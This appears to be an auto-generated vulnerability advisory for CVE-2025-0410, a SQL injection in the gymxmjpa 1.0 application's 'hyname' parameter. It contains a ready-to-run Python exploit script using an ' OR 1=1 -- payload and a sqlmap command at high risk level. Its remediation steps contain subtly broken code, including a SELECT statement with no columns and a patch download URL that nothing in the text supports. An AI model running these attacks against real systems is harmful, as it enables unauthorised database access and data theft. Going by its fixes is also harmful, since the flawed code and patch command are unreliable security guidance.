The CVE-2025-0410 vulnerability in liujianview gymxmjpa 1.0 allows remote attackers to execute arbitrary SQL queries via the `hyname` parameter in the `MenberDaoInpl` function. The flaw exists due to improper sanitization of user-supplied input in src/main/java/com/liujian/gymxmjpa/controller/MenberConntroller.java. Attackers can manipulate SQL commands by injecting malicious payloads, leading to unauthorized database access, data theft, or system compromise. The vulnerability is exploitable over the network without authentication, making it critical.
DailyCVE Form:
Platform: liujianview gymxmjpa
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 01/12/2025
What Undercode Say:
Exploit:
import requests
url = "http://target.com/gymxmjpa/menber"
payload = "' OR 1=1 --"
params = {"hyname": payload}
response = requests.get(url, params=params)
print(response.text)
Protection:
1. Use prepared statements:
String query = "SELECT FROM menber WHERE hyname = ?"; PreparedStatement stmt = connection.prepareStatement(query); stmt.setString(1, hyname);
2. Input validation:
if (!hyname.matches("[a-zA-Z0-9]+")) {
throw new IllegalArgumentException("Invalid input");
}
3. Enable WAF rules:
mod_security_rules='SecRule ARGS:hyname "@detectSQLi" deny'
4. Patch upgrade:
wget https://patch.liujianview.com/gymxmjpa/1.0.1 -O gymxmjpa.jar
5. Log monitoring:
grep "SQLException" /var/log/tomcat/catalina.out
6. Disable verbose errors:
<error-page> <error-code>500</error-code> <location>/error.jsp</location> </error-page>
7. Test exploit:
sqlmap -u "http://target.com/gymxmjpa/menber?hyname=test" --risk=3
8. Harden database:
REVOKE ALL PRIVILEGES ON menber FROM 'gymuser'@'%';
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
